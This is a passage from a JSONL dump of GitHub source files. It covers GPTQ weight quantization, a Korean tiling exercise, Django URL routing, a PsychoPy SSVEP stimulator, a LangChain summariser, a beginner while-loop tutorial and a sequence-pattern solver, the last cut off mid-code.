self.len_parallel_layers:\n current_layer.forward_count = 0\n raise StopFwdException\n\n def single_layer_update(self, percdamp=.01):\n weight = self.layer.weight.data\n dev = weight.device\n\n # Store the original dtype of the weights\n # During computation, everything is converted to float32.\n # When the weights are updated, we cast everything back to the original dtype\n dtype = weight.dtype\n\n if isinstance(self.layer, SUPPORTED_CONV_OP):\n if isinstance(self.layer, (qnn.QuantConvTranspose1d, qnn.QuantConvTranspose2d)):\n weight = weight.transpose(1, 0) # This performs a view\n weight = weight.flatten(1)\n\n # List with permutation tensors for the Hessian and Weight matrix.\n # If act_order is False, the tensors will be ordered indexes.\n # For groupwise convolution, we have one tensor per group,\n # thus len(permutation_list) is always equal to self.groups.\n # We do not explicity permute the weight matrix, only the Hessian.\n permutation_list = []\n weight = weight.view(self.groups, -1, weight.shape[-1])\n # For groupwise convolution, these operations are groupwise so we iterate\n for i in range(self.groups):\n # If a diagonal element on the Hessian is zero, we can set to 0 the corresponding\n # column in the weight matrix.\n # The diagonal element is set to 1 to avoid division-by-zero\n dead = torch.diag(self.H[i, :, :]) == 0\n self.H[i, dead, dead] = 1\n # If the diagonal of activations is zero, we set the weight to zero\n weight[i, :, dead] = 0\n if self.act_order:\n # Re-order Hessian so that weights associated to\n # higher magnitude activations are quantized first\n perm = torch.argsort(torch.diag(self.H[i, :, :]), descending=True)\n self.H[i, :, :] = self.H[i, perm, :][:, perm]\n else:\n # No permutation, permutation tensor is a ordered index\n perm = torch.tensor(range(self.H.shape[-1]), device=dev)\n permutation_list.append(perm)\n\n # Try/Except in case the inverse Hessian cannot be computed\n try:\n for i in range(self.groups):\n damp = percdamp * torch.mean(torch.diag(self.H[i, :, :]))\n diag = torch.arange(self.columns, device=dev)\n self.H[i, diag, diag] += damp\n self.H[i, :, :] = torch.linalg.cholesky(self.H[i, :, :])\n self.H[i, :, :] = torch.cholesky_inverse(self.H[i, :, :])\n self.H[i, :, :] = torch.linalg.cholesky(self.H[i, :, :], upper=True)\n h_inv = self.H\n except LinAlgError as e:\n warnings.warn(\n f'Failed to compute the inverse of the Hessian for layer {self.name} '\n f'GPTQ will not be applied. '\n f'Increasing the number of samples might fix this issue')\n return\n finally:\n del self.H\n\n for i1 in range(0, self.columns, self.blocksize):\n i2 = min(i1 + self.blocksize, self.columns)\n count = i2 - i1\n error_block = torch.zeros_like(\n weight[:, :, perm[i1:i2]], dtype=torch.float32) # [groups, OC/groups, i2-i1]\n\n h_inv_block = h_inv[:, i1:i2, i1:i2]\n for i in range(count):\n q_groups = self.get_quant_weights(i, i1, permutation_list) # [groups, OC/groups]\n for group_index in range(self.groups):\n perm = permutation_list[group_index]\n q = q_groups[group_index] # [OC/groups]\n w = weight[group_index, :, perm[i1:i2][i]].to(torch.float32) # [OC/groups]\n d = h_inv_block[group_index, i, i] # [1]\n error = (w - q) / d # [OC/groups]\n error_block[group_index, :, i] = error\n # We need to update the original weights\n weight[group_index, :, perm[i1:i2][i:]] -= (\n error.unsqueeze(1).matmul(h_inv_block[group_index, i,\n i:].unsqueeze(0))).to(dtype)\n\n for group_index in range(self.groups):\n perm = permutation_list[group_index]\n weight[group_index, :, perm[i2:]] -= (\n error_block[group_index].matmul(h_inv[group_index, i1:i2, i2:])).to(dtype)\n","repo_name":"fabianandresgrob/brevitas","sub_path":"src/brevitas/graph/gptq.py","file_name":"gptq.py","file_ext":"py","file_size_in_byte":11287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12104638170","text":"# 문제\n# 2×n 크기의 직사각형을 1×2, 2×1 타일로 채우는 방법의 수를 구하는 프로그램을 작성하시오.\n#\n# 아래 그림은 2×5 크기의 직사각형을 채운 한 가지 방법의 예이다.\n#\n#\n#\n# 입력\n# 첫째 줄에 n이 주어진다. (1 ≤ n ≤ 1,000)\n#\n# 출력\n# 첫째 줄에 2×n 크기의 직사각형을 채우는 방법의 수를 10,007로 나눈 나머지를 출력한다.\n#\n# 예제 입력 1\n# 2\n# 예제 출력 1\n# 2\n\n# 예제 입력 2\n# 9\n# 예제 출력 2\n# 55\n\nn = int(input())\ncount = 0\na = 1\nb = 2\nif n ==1:\n print(a)\nelif n ==2:\n print(b)\nelse:\n for i in range(n-2):\n # print('증가전',a,b)\n # c에 i번째 타일링 가능 개수가 들어감\n c = a + b\n # count += c\n a = b\n b = c\n # print('증가후',a,b,c)\n print(c%10007)","repo_name":"jinhuioh/home_pythorn","sub_path":"pythonProject_codingTest/codingTest/백준문제/그리디/2곱하기n타일링.py","file_name":"2곱하기n타일링.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19808270929","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import UnivariateSpline\n\nx = np.linspace(-10, 10, 50)\ny = np.exp(-x ** 2) + 0.1 * np.random.randn(50)\nplt.plot(x, y, 'ro', ms=5)\nplt.show()\nspl = UnivariateSpline(x, y)\nxs = np.linspace(-10, 10, 50)\nplt.plot(xs, spl(xs), 'g', lw=3)\nplt.show()\n","repo_name":"Artem3223/Scipy-Interpalation","sub_path":"Scipy2.py","file_name":"Scipy2.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17123868883","text":"\"\"\"Project_PUR URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n#Main Project Url\n\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom account import views as accountview\n\n\nurlpatterns = [\n\turl(r'^$',accountview.false),\n\turl(r'^login/$',accountview.loginit,name='login'),\n\turl(r'^logout/$',accountview.logoutit,name='logout'),\n\turl(r'^purchecker/$',accountview.checkpur,name='checkpur'),\n\turl(r'^purgen/$',accountview.UploadPURForm,name='uploadpur'),\n\turl(r'^test/$',accountview.test,name='test'),\n\turl(r'^generate_cert/(?P[0-9A-Za-z]+)/(?P[0-9A-Za-z ]+)$',accountview.cert,name='printcert'),\n\turl(r'^android/(?P[0-9A-Za-z]+)/(?P[0-9A-Za-z]+)$',accountview.androidapi),\n\turl(r'^signup/$',accountview.createaccount,name='createaccount'),\n\turl(r'^profile/$',accountview.dashboard,name='profile'),\n\turl(r'^hospital/$',accountview.hospital,name='hospital'),\n]\n","repo_name":"sanudatta11/Project_PUR","sub_path":"Project_PUR/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30225032310","text":"from PyQt5 import QtCore\nimport pyqtgraph as pg\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io.wavfile import write\nimport winsound\nimport math\n\nmidColor = [(0, 182, 188, 255), (128, 128, 128, 255), (0, 128, 128, 255), (230,0,115, 255), (204, 0, 0, 255)]\nmaxColor = [(246, 111, 0, 255), (0, 0, 0, 255), (230, 230, 0, 255), (0,0,0, 255), (0, 0, 0, 255)]\nminColor = [(75, 0, 113, 255), (255, 255, 255, 255), (102, 0, 34, 255), (255,255,255, 255), (255,255,255, 255)]\n\nclass signal(object):\n timer = QtCore.QTimer()\n speedFactor = 3000\n\n def __init__(self, data, fs, widget, winNumber):\n self.amplitude = np.int32((data))\n self.fs = fs\n self.fmax = fs/2\n self.maxAmplitude = self.amplitude.max()\n self.minAmplitude = self.amplitude.min()\n self.zoomFactor = 1\n self.__class__.speedFactor = fs/10\n self.time = np.linspace(0., len(data)/fs, len(data))\n self.startTimeIdx = 0\n self.endTimeIdx = int(fs * self.zoomFactor) - 1\n self.__class__.timer.setInterval(200) # m interval\n self.widget = widget\n self.winNumber = winNumber\n self.plot()\n self.listen()\n\n def updateSignal(self, data):\n self.amplitude = np.int32((data))\n self.time = np.linspace(0., len(data)/self.fs, len(data))\n self.plot()\n self.save()\n self.listen()\n\n def plot(self):\n self.maxAmplitude = self.amplitude.max()\n self.minAmplitude = self.amplitude.min()\n self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n self.widget.setYRange(self.minAmplitude * self.zoomFactor , self.maxAmplitude * self.zoomFactor)\n self.pen = pg.mkPen(color=(255, 0, 0))\n self.widget.clear()\n self.widget.plot(self.time, self.amplitude, pen=self.pen)\n\n def moveGraph(self):\n if len(self.time) - int(self.fs * self.zoomFactor):\n self.startTimeIdx = int(self.startTimeIdx + self.__class__.speedFactor) % (len(self.time) - int(self.fs * self.zoomFactor))\n self.endTimeIdx = int(self.endTimeIdx + self.__class__.speedFactor % len(self.time)) - 1\n self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n\n def scrollSignal(self, value): # value: 0 -> 100\n if len(self.time) - int(self.fs * self.zoomFactor):\n self.startTimeIdx = int(value/100* (len(self.amplitude) - int(self.fs * self.zoomFactor - 1)))\n self.endTimeIdx = int(self.startTimeIdx + int(self.fs * self.zoomFactor - 1))\n self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n\n def zoomIn(self):\n if self.zoomFactor >= 0.2:\n self.zoomFactor = self.zoomFactor - 0.1\n self.adjustGraph()\n\n def zoomOut(self):\n if self.zoomFactor < 2.0:\n self.zoomFactor = self.zoomFactor + 0.1\n self.adjustGraph()\n\n def adjustGraph(self):\n self.endTimeIdx = int(self.startTimeIdx + int(self.fs * self.zoomFactor - 1))\n self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n self.widget.setYRange(self.minAmplitude * self.zoomFactor , self.maxAmplitude * self.zoomFactor)\n\n def getFigure(self):\n fig = plt.figure(figsize=(10, 5))\n plt.plot(self.time[self.startTimeIdx:self.endTimeIdx],self.amplitude[self.startTimeIdx:self.endTimeIdx])\n plt.xlabel('time (sec)')\n plt.ylabel('amplitude (mv)')\n return fig\n\n def getSpectrogram(self, cmap):\n fig = plt.figure(figsize=(10, 5))\n plt.specgram(self.amplitude, Fs=self.fs, cmap = cmap)\n plt.xlabel('time (sec)')\n plt.ylabel('frequency (Hz)')\n plt.colorbar()\n return fig\n\n def initSpectrogram(self, imageItem, hist):\n # Scale the X and Y Axis to time and frequency (standard is pixels)\n imageItem.scale(self.time[-1]/np.size(self.powerSpectrum, axis=1), math.pi/np.size(self.powerSpectrum, axis=0))\n self.setSpectrogramColor(hist, 0)\n\n def setSpectrogramColor(self, hist, slidervalue): # slidervalue -> 0: 4\n hist.gradient.restoreState({'mode': 'rgb','ticks': [(0.5, midColor[slidervalue]),(1.0, maxColor[slidervalue]),(0.0, minColor[slidervalue])]})\n hist.gradient.saveState()\n\n def plotSpectrogram(self, imageItem):\n self.powerSpectrum, self.freqenciesFound, _, _ = plt.specgram(self.amplitude, Fs=self.fs)\n # for more colormaps: https://matplotlib.org/2.0.2/examples/color/colormaps_reference.html\n # Sxx contains the amplitude for each pixel\n imageItem.setImage(self.powerSpectrum)\n\n def moveSpectrogram(self, minIntensity, maxIntensity, plotItem, hist):\n # Fit the min and max levels of the histogram to the data available\n min = np.min(self.powerSpectrum)\n max = np.max(self.powerSpectrum)\n hist.setLevels(min + (max - min) * minIntensity, max * maxIntensity)\n # plotItem.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n\n def listen(self):\n winsound.PlaySound(\"output_sound\" + str(self.winNumber) + \".wav\", winsound.SND_ASYNC)\n def save(self):\n write(\"output_sound\" + str(self.winNumber) + \".wav\", self.fs, self.amplitude.astype(np.int16))\n","repo_name":"badra022/Music-Equalizer","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23203868688","text":"from board.Board import Board\r\nfrom board.StartingCoord import StartingCoord\r\nimport argparse\r\n\r\n\r\ndef convert_input_to_starting_coord(input):\r\n split = input.split(',')\r\n nums = [int(num.strip()) for num in split]\r\n assert len(nums) == 3\r\n\r\n return StartingCoord(nums[0], nums[1], nums[2])\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--initial_vals', required=True, nargs='+', type=convert_input_to_starting_coord)\r\n\r\n\r\nif __name__ == '__main__':\r\n args = parser.parse_args()\r\n board = Board()\r\n\r\n board.solve(args.initial_vals)\r\n\r\n board.print_all_subgroups()\r\n","repo_name":"sheric98/sudoku_subgrouping","sub_path":"SudokuSolver.py","file_name":"SudokuSolver.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72240227688","text":"import os\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom random import randint\n\n\ndef get_data(path):\n minf = 1500\n maxf = 2300\n data = pd.DataFrame()\n scaler = MinMaxScaler(feature_range=(0, 1))\n # n_train = 10000\n # batch_size = 12288\n batch_size = 1024*3\n n_batch = 30 * batch_size #this should be like n times timesteps * batch_size\n\n rand_start = randint(1, 70000)\n\n for root, dirs, files in os.walk(path):\n \"\"\"\n not sure if dirs sorting is needed\n dirs.sort()\n \"\"\"\n\n #sort file names\n files.sort(key=lambda x: x.lower())\n for file in files:\n name = os.path.join(root, file)\n if 'input' in name:\n input = pd.read_table(name, header=None)\n\n input = input[rand_start:rand_start + 3 * n_batch] #take 3 parts randomly\n\n values = input.values\n values = values.astype('float32')\n\n # normalize\n\n scaled_x = scaler.fit_transform(values)\n input = pd.DataFrame(scaled_x, columns=['input1', 'input2'])\n # normalize f\n input['f'] = (int(root.strip().split('_')[1]) - minf) / (maxf - minf)\n\n elif 'output' in name:\n output = pd.read_table(name, header=None)\n\n output = output[rand_start:rand_start + 3 * n_batch]\n\n values = output.values\n values = values.astype('float32')\n\n # no normalize\n # scaled_y = scaler.fit_transform(values)\n output = pd.DataFrame(values, columns=['output1', 'output2'])\n\n df = pd.concat([input, output], axis=1)\n data = pd.concat([data, df], sort=False)\n else:\n pass\n\n return data, batch_size, n_batch\n\n\n\n","repo_name":"godeity/frequency-project","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41029081061","text":"from langchain import PromptTemplate, LLMChain\nfrom langchain.prompts import PromptTemplate\nfrom langchain.chat_models import ChatOpenAI\nimport textwrap\nimport os, time\n\n\ndef summarise (text): \n llm = ChatOpenAI(openai_api_key=\"sk-xxxxxxxxxxx\",temperature=0,model_name=\"gpt-3.5-turbo\")\n prompt = PromptTemplate(\n input_variables=[\"text\"],\n template=\"Concisly summarise the following text and start your summary with \"\"---\"\": {text}\",\n )\n chain = LLMChain(llm=llm, prompt=prompt)\n summary = chain.run(text)\n return summary \n\n# open the file at the given filepath and return its content\ndef open_file(filepath):\n with open(filepath, 'r', encoding='utf-8') as infile:\n return infile.read()\n\n\nif __name__ == '__main__':\n\n #set parameters\n input_directory = 'Texts'\n output_directory = 'Summaries'\n\n # loop through all files in folder\n for filename in os.listdir(input_directory):\n filepath = os.path.join(input_directory, filename)\n text = open_file(filepath)\n\n # break them down into chunks, 2000 characters each\n chunks = textwrap.wrap(text, 1400,break_long_words=False)\n count = 0\n index = 0\n\n print (\"Summarising: \"+ filename +\"...\\n\")\n \n # loop over the chunks\n for chunk in chunks:\n\n # try generate a summary through all available bot instances\n count = count + 1\n success = False\n error_not_yet_shown = True\n retry_count = 0\n while not success:\n try:\n summary = summarise(chunk)\n summary = summary.replace(\"---\", \"\\n- \")\n success = True\n retry_count = 0 \n except Exception as not_summarised:\n print(not_summarised)\n if error_not_yet_shown: \n print (\"Hold tight, retrying until it works...\\n\")\n error_not_yet_shown = False \n success = False\n with open ('error_log.txt', 'w', encoding = 'utf-8') as f:\n f.write (\"Summarisation failed for: \"+filename+\" for the following chunk of text:\\n\\n\\\"\"+chunk+\"\\\"\\n\\n\")\n f.close()\n retry_count += 1\n if retry_count >= 5:\n time.sleep(30)\n retry_count = 0\n\n print('\\n\\n\\n', count, 'of', len(chunks), ' - ', summary)\n\n # append to and save the summary file in the Summaries/ folder\n with open(os.path.join(output_directory, filename), 'a', encoding='utf-8') as f:\n f.write(summary + '\\n\\n')\n f.close()\n","repo_name":"JunMagic88/TLDR-Local","sub_path":"TLDR-Local.py","file_name":"TLDR-Local.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72416493609","text":"__author__ = 'teddyxiong53'\n__contact__ = '1073167306@qq.com'\n__projecturl__ = 'https://github.com/teddyxiong53/wxnote'\n\n__appname__ = 'WXNote'\n__license__ = 'MIT'\n\n__description__ = 'A notepad based on wxpython'\n\n__descriptionfull__ = '''Try to replace notepad++'''\n\n__licensefull__ = '''\nMIT license\n'''\n","repo_name":"teddyxiong53/wxnote","sub_path":"wxnote/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23301671778","text":"from django import forms\nfrom .models import Employee\n\n\nclass EmployeeForm(forms.ModelForm):\n class Meta:\n model = Employee\n fields = ['id', 'fullname', 'empcode', 'mobile', 'position']\n labels = {\n 'fullname': 'Full Name',\n 'empcode': 'Emp Code',\n\n }\n\n def __init__(self, *args, **kwargs):\n super(EmployeeForm, self).__init__(*args, **kwargs)\n\n # self.fields['position'].empty_label =\"Select\"\n\n def save(self, commit=True):\n instance = super(EmployeeForm, self).save(commit=False)\n if commit:\n instance.save()\n return instance\n\n\nclass employeeSearchForm(forms.ModelForm):\n class Meta:\n model = Employee\n fields = ['empcode']\n","repo_name":"Tejustj1995/employeelist","sub_path":"employeedetails/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21771255351","text":"from numpy import random\nimport datetime\nimport time\nfrom psychopy import visual, core, event\nfrom StimulationProcess.StimulationController import StimulationController\nimport os\nfrom tqdm import tqdm\nimport numpy as np\nimport pickle\n\nclass viewContainer():\n # container 应该包含所有刺激所需的要素\n def __init__(self,config) -> None:\n\n # w 代表window,所有的刺激都要在win上显示\n self.w = None\n # initFrame代表初始帧,非刺激状态下都是这一帧\n self.initFrame = None\n # frameSet是ImageStim的集合,是刺激帧\n self.frameSet = None\n # cue应该是一串数组\n self.cue = None\n # targetPos是每个目标在屏幕上的位置,显示cue的时候用得到\n self.targetPos = None\n # stringPos是在线实验时候,字符的位置,暂时用不到\n self.stringPos = None\n\n \n self.takeConfig(config)\n pass\n\n def takeConfig(self,config):\n\n self.cue = config.cue\n self.char = config.char\n self.targetNUM = config.targetNUM\n self.blockNUM = config.blockNUM\n self.displayChar = config.displayChar\n self.resolution = config.resolution\n if config.masked is not None:\n self.masks = config.masked\n\n pass\n\n\nclass Stimulator():\n\n def __init__(self,config) -> None:\n\n self.addSTI = config.addSTI\n\n # viewContainer 用来装载刺激呈现的要素\n self.viewContainer = viewContainer(config)\n # controller 用来控制刺激呈现\n\n self.controller = StimulationController()\n \n pass \n\n\n def loadPics(self):\n\n xScreen,yScreen = self.viewContainer.resolution\n\n win = visual.Window([xScreen, yScreen], monitor=\"testMonitor\", units=\"pix\", fullscr=True,waitBlanking=True, color=(0, 0, 0), colorSpace='rgb255', screen=0,allowGUI=True)\n # win.close()\n picAdd = os.listdir(self.addSTI)\n frameSet = []\n # initial frame\n add = self.addSTI + os.sep + 'initial_frame.png'\n initFrame = visual.ImageStim(win, image=add, pos=[0, 0], size=[xScreen, yScreen], units='pix', flipVert=False)\n\n # stimulation frames\n\n for picINX in tqdm(range(len(picAdd)-2)):\n add = self.addSTI + os.sep + '%i.png' % picINX\n frame = visual.ImageStim(win, image=add, pos=[0, 0], size=[xScreen, yScreen], units='pix', flipVert=False)\n frameSet.append(frame)\n\n self.viewContainer.w = win\n self.viewContainer.frameSet = frameSet\n self.viewContainer.initFrame = initFrame \n\n with open(self.addSTI+os.sep+'STI.pickle', \"rb\") as fp:\n pos = pickle.load(fp)\n \n self.viewContainer.targetPos = pos.rectSet\n self.viewContainer.stringPos = pos.stringPositions\n\n return self\n\n def run(self):\n\n self.controller.initial(self.viewContainer)\n\n while True:\n self.controller.run()\n self.controller.change()\n\n \n\n\nif __name__ == '__main__':\n \n addSTI = 'picFolder/ssvep'\n stimulator = Stimulator(addSTI)\n stimulator.loadPics()\n stimulator.run()\n","repo_name":"ShinlDiego/40-PschoPy","sub_path":"stimulator.py","file_name":"stimulator.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41571538457","text":"# In this code, we have defined a variable name condition,\n# and condition starts at a value of 1.\ncondition = 1\n\nwhile condition < 10:\n\tprint(condition)\n\tcondition += 1\n# This setup of a while loop is known as creating a \"counter,\" since basically that\n# is what we're doing. We're saying we just want to count 1 for every iteration and\n# eventually stop at our limit. While loops are usually finite and defined in this\n# sense, but while loops can also be undefined. Something like:\n\tprint(condition)\n\tcondition += 1\n# In this case, this loop would continue running while it was raining outside. \n# When the rain stopped, the loop would cease.\nwhile isRaining:\n\tprint(condition)\n# If you actually run the following code, you can stop it by doing ctrl+c to break it. \n# The following is an intentional infinite loop\nwhile True:\n\tprint('doing stuff!!')","repo_name":"SaretMagnoslove/Python_3_Basics_Tutorial_Series-Sentdex","sub_path":"Lesson04_while_loops.py","file_name":"Lesson04_while_loops.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13422146326","text":"#coding:utf8\r\nimport tkinter\r\n\"\"\"\r\n = (,,...)\r\n\r\n\"\"\"\r\ndef hello():\r\n print(\"hello\")\r\napp = tkinter.Tk()\r\nlabel_welcome=tkinter.Label(app,text = \"Bienvenu\")# au lieu de text justify qui fait meme effet que pack\r\nprint(label_welcome.cget(\"text\"))\r\nprint(label_welcome[\"text\"])\r\nlabel_welcome.configure(text =\"text\")\r\nlabel_welcome.pack()\r\nmessage_welcome = tkinter.Message(app,text =\"Bonjour\\n tout le monde bienvenu sur la chaine formation vidéo\")\r\nmessage_welcome.pack()\r\nentry_name = tkinter.Entry(app,width = \"45\",show = \"*\",exportselection=0)#export selection vers presse papier interdite\r\nentry_name.pack()\r\nbutton_quit = tkinter.Button(app,text = \"Quitter\",width =25,height =2,command =hello)\r\nbutton_quit.pack()\r\napp.mainloop()","repo_name":"CherifaHamroun/python-project","sub_path":"Cours/WidgetTkinter.py","file_name":"WidgetTkinter.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19199946217","text":"import itertools\nimport numpy as np\nfrom scipy import optimize\nfrom itertools import combinations, permutations, product\nimport re\n\nMAX_SEQ = 200\nDEBUG = False\nLOCAL = True\ndef make_seq(c,seq_type = 1):\n if seq_type ==2:\n return make_seq_poly(c)\n c0 = c[0]\n c1 = c[1]\n c2 = c[2]\n try:\n c3 = c[3]\n except:\n c3 = 0\n\n try:\n c4= c[4]\n except:\n c4 = 0\n\n seq=[]\n for i in range(MAX_SEQ):\n\n if i==0:\n seq.append(c0)\n elif i==1:\n seq.append(c1)\n else:\n\n seq.append(seq[i-2]*c2+seq[i-1]*c3)\n\n return seq\n\n\ndef make_seq_poly(c):\n c0 = c[0]\n c1 = c[1]\n try:\n c2 = c[2]\n except:\n c2 = 0\n try:\n c3 = c[3]\n except:\n c3 = 0\n\n\n seq=[]\n for i in range(MAX_SEQ):\n seq.append(c0+c1*i+c2*i**2+c3*i**3)\n return seq\n\n\ndef print_seq(c,seq_type=1):\n if LOCAL: print('predicted seq:',make_seq(c,seq_type)[:10])\n\ndef solve_seq_pattern(seq_inp, init=[1,1,1,0]):\n def cal_loss(c):\n seq_pred= make_seq(c)\n seq_pred = seq_pred[0:len(seq_inp)]\n loss = 0\n\n \n for i in range(len(seq_inp)):\n \n if seq_inp[i]>=0:\n loss = loss+ (seq_pred[i]-seq_inp[i])**2\n \n return loss\n\n def cal_loss_poly(c):\n seq_pred= make_seq_poly(c)\n seq_pred = seq_pred[0:len(seq_inp)]\n loss = 0\n\n \n for i in range(len(seq_inp)):\n \n if seq_inp[i]>=0:\n loss = loss+ (seq_pred[i]-seq_inp[i])**2\n \n return loss\n if LOCAL: print('1nd try: polynomical')\n\n n_seq = get_n_seq(seq_inp)\n x = init\n if len(x)>n_seq:\n x = x[0:n_seq]\n\n if len(x)>4:\n x = x[0:4]\n out = optimize.fmin(cal_loss_poly, x,xtol=1E-10,ftol=1E-20,maxiter=5000,full_output=True,disp=DEBUG)\n loss = out[1]\n if out[4]!=0:\n if LOCAL: print('max_iteration warning!(1)')\n if LOCAL: \n print('1st loss:', loss)\n print('c:',out[0])\n seq_type = 2\n\n if loss > 1E-1:\n seq_type = 1\n x = init\n if len(x)>=4:\n x = x[0:4]\n out = optimize.fmin(cal_loss, x,xtol=1E-10,ftol=1E-20,maxiter=5000,full_output=True,disp=DEBUG)\n loss = out[1]\n if LOCAL: print('2nd loss',loss)\n if out[4]!=0:\n if LOCAL: print('max_iteration warning!(1)')\n\n out_c = out[0].tolist()\n if LOCAL: print(\"out_c:\",out_c)\n if len(init)>n_seq:\n out_c.append(0)\n if LOCAL: print(\"out_c:\",out_c)\n\n\n return out_c, loss, seq_type\n\ndef cal_seq(c,n,seq_type=1):\n seq = make_seq(c,seq_type)\n return seq[n-1]\n\n\ndef find_seq(seq_inp,c,eq,seq_type=1):\n seq_pred = make_seq(c,seq_type)\n n_seq=get_n_seq(seq_inp)\n c = c+[0,0,0]\n code = \"\"\n for i in range(len(seq_inp)):\n if seq_inp[i]==-1:\n A = seq_pred[i]\n code = code+ 'A = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n if eq == 'A' : n = i\n elif seq_inp[i]==-2:\n B = seq_pred[i]\n code = code+ 'B = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n if eq == 'B' : n = i\n elif seq_inp[i]==-3:\n C = seq_pred[i]\n code = code+ 'C = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n if eq == 'C' : n = i\n elif seq_inp[i]==-4:\n D = seq_pred[i]\n code = code+ 'D = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n if eq == 'D' : n = i\n elif seq_inp[i]==-5:\n X = seq_pred[i]\n code = code+ 'X = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n if eq == 'X' : n = i\n elif seq_inp[i]==-6:\n Y = seq_pred[i]\n code = code+ 'Y = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n if eq == 'Y' : n = i\n elif seq_inp[i]==-7:\n Z = seq_pred[i]\n code = code+ 'Z = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n if eq == 'Z' : n = i\n if LOCAL: print(eq)\n return eval(eq), code\n\ndef find_seq_string(seq,target):\n seq_ori = seq\n if LOCAL: print(\"find_seq_string:\",target, seq)\n\n if seq[-1] < 0:\n seq = seq[:-1]\n\n code = ''\n code = code + \"seq=\"+str(seq)+'\\n'\n\n\n pattern_len = len(seq)\n key = 0\n for i, n in enumerate(seq):\n if i==0: key = seq[i]\n if i>1 and seq[i]==key:\n pattern_len = i\n break\n code = code + \"pattern_len = len(seq)\\n\"\n if LOCAL: print(seq)\n if str(type(target))==\"\":\n \n out = seq[(target-1)%pattern_len]\n \n code = code + \"target=%d\\n\"%target\n code = code + \"print(seq[(target-1)%pattern_len])\"\n\n else:\n if target == 'A': \n value = -1\n if target == 'B': \n value = -2\n if target == 'C': \n value = -3\n if target == 'D': \n value = -4\n if target == 'X': \n value = -5\n if target == 'Y': \n value = -6\n if target == 'Z': \n value = -7\n idx = seq_ori.index(value)\n out = seq_ori[idx%pattern_len]\n code = code + \"print(seq[%d%%%d])\"%(idx,pattern_len)\n \n if LOCAL: print(code)\n return out, code\n\ndef print_seq_eq(c,target,seq_type):\n out = ''\n\n if LOCAL: print('c:', c)\n c.append(0)\n c.append(0)\n\n if seq_type ==2:\n if str(type(target))==\"\":\n if len(target)==1:\n n = len(target)\n print(\"warning!!!!\")\n out = \"print(int(round(%f+%f*%d+%f*%d**2+%f*%d**3)))\"%(c[0],c[1],n,c[2],n,c[3],n)\n else:\n out = \"print(int(round(%s)))\\n\"%target\n else:\n n = target-1\n out = \"print(int(round(%f+%f*%d+%f*%d**2+%f*%d**3)))\"%(c[0],c[1],n,c[2],n,c[3],n)\n\n elif seq_type ==1:\n out = out + 'c0 = %f\\n'%c[0]\n out = out + 'c1 = %f\\n'%c[1]\n out = out + 'c2 = %f\\n'%c[2]\n out = out + 'c3 = %f\\n'%c[3]\n out = out + 'c4 = %f\\n'%c[4]\n out = out + 'seq=[]\\n'\n out = out + 'for i in 